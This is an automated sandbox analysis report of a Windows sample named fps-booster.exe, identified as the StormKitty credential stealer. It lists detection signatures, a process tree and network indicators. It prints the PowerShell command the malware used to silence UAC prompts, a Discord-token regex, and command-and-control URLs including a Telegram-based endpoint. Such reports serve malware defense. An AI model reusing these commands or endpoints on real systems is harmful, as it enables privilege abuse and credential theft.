Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fps-booster.exe

Overview

General Information

Sample name:fps-booster.exe
Analysis ID:1482549
MD5:913b3caeab0b292da088ea75c53ac17e
SHA1:67cb9da80781ac62725b34f7ba73b8267ba767cd
SHA256:9cfc821a019cfefcd580ae7bd6152438b3447e2a7a45e68c6d0cb4227fc8da21
Tags:exe
Infos:

Detection

StormKitty
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected StormKitty Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fps-booster.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\fps-booster.exe" MD5: 913B3CAEAB0B292DA088EA75C53AC17E)
    • powershell.exe (PID: 6960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
    • 0x9abb:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
    Process Memory Space: fps-booster.exe PID: 1488JoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
      Process Memory Space: fps-booster.exe PID: 1488JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: fps-booster.exe PID: 1488INDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
        • 0x69985:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0, CommandLine|base64offset|contains: I~">)zr, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fps-booster.exe", ParentImage: C:\Users\user\Desktop\fps-booster.exe, ParentProcessId: 1488, ParentProcessName: fps-booster.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0, ProcessId: 6960, ProcessName: powershell.exe

        Snort Signatures

        No Snort rule has matched

        Suricata Signatures

        Timestamp:2024-07-26T01:15:23.555322+0200
        SID:2022930
        Source Port:443
        Destination Port:49722
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-26T01:14:31.085025+0200
        SID:2041654
        Source Port:49710
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-26T01:14:46.020724+0200
        SID:2022930
        Source Port:443
        Destination Port:49718
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: fps-booster.exeJoe Sandbox ML: detected
        Source: fps-booster.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 217.78.239.114:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49711 version: TLS 1.2
        Source: fps-booster.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Xml.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\ source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Microsoft.CSharp.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.pdbX source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: HP>o0C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2482911967.0000000000CF6000.00000004.00000010.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Configuration.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2490642163.00000000085DF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Xml.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Windows.Forms.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbT source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Drawing.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Management.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2491192171.0000000008632000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb< source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Desktop\fps-booster.PDB source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbN source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb7 source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
        Source: global trafficHTTP traffic detected: GET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1
        Source: global trafficHTTP traffic detected: GET /+KXQGBw_yd2o1ZmYy HTTP/1.1
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1
        Source: global trafficHTTP traffic detected: GET /+KXQGBw_yd2o1ZmYy HTTP/1.1
        Source: global trafficDNS traffic detected: DNS query: smallduck.ru
        Source: global trafficDNS traffic detected: DNS query: t.me
        Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
        Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
        Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoq
        Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
        Source: fps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
        Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
        Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
        Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownHTTPS traffic detected: 217.78.239.114:443 -> 192.168.2.6:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49711 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
        Source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_013308680_2_01330868
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_013314EF0_2_013314EF
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0133D9380_2_0133D938
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0133F7380_2_0133F738
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F4B480_2_0B2F4B48
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F66F00_2_0B2F66F0
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F68F60_2_0B2F68F6
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2FA1370_2_0B2FA137
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F97C70_2_0B2F97C7
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2F642C0_2_0B2F642C
        Source: C:\Users\user\Desktop\fps-booster.exeCode function: 0_2_0B2FA40F0_2_0B2FA40F
        Source: C:\Users\user\Desktop\fps-booster.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
        Source: fps-booster.exe, 00000000.00000002.2483051599.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fps-booster.exe
        Source: fps-booster.exe, 00000000.00000002.2492710769.000000000B110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLeaf.xNet.dll* vs fps-booster.exe
        Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs fps-booster.exe
        Source: fps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
        Source: fps-booster.exe, 00000000.00000000.2090296248.000000000096C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
        Source: fps-booster.exeBinary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
        Source: fps-booster.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
        Source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
        Source: fps-booster.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal80.troj.spyw.evad.winEXE@5/8@2/2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1468:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1488
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmqbeask.pso.ps1Jump to behavior
        Source: fps-booster.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: fps-booster.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\fps-booster.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeFile read: C:\Users\user\Desktop\fps-booster.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\fps-booster.exe "C:\Users\user\Desktop\fps-booster.exe"
        Source: C:\Users\user\Desktop\fps-booster.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\fps-booster.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
        Source: C:\Users\user\Desktop\fps-booster.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: fps-booster.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: fps-booster.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Xml.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\ source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Microsoft.CSharp.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.pdbX source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: HP>o0C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2482911967.0000000000CF6000.00000004.00000010.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Configuration.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2490642163.00000000085DF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Xml.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA8F.tmp.dmp.6.dr
        Source: Binary string: System.Core.ni.pdb source: WEREA8F.tmp.dmp.6.dr
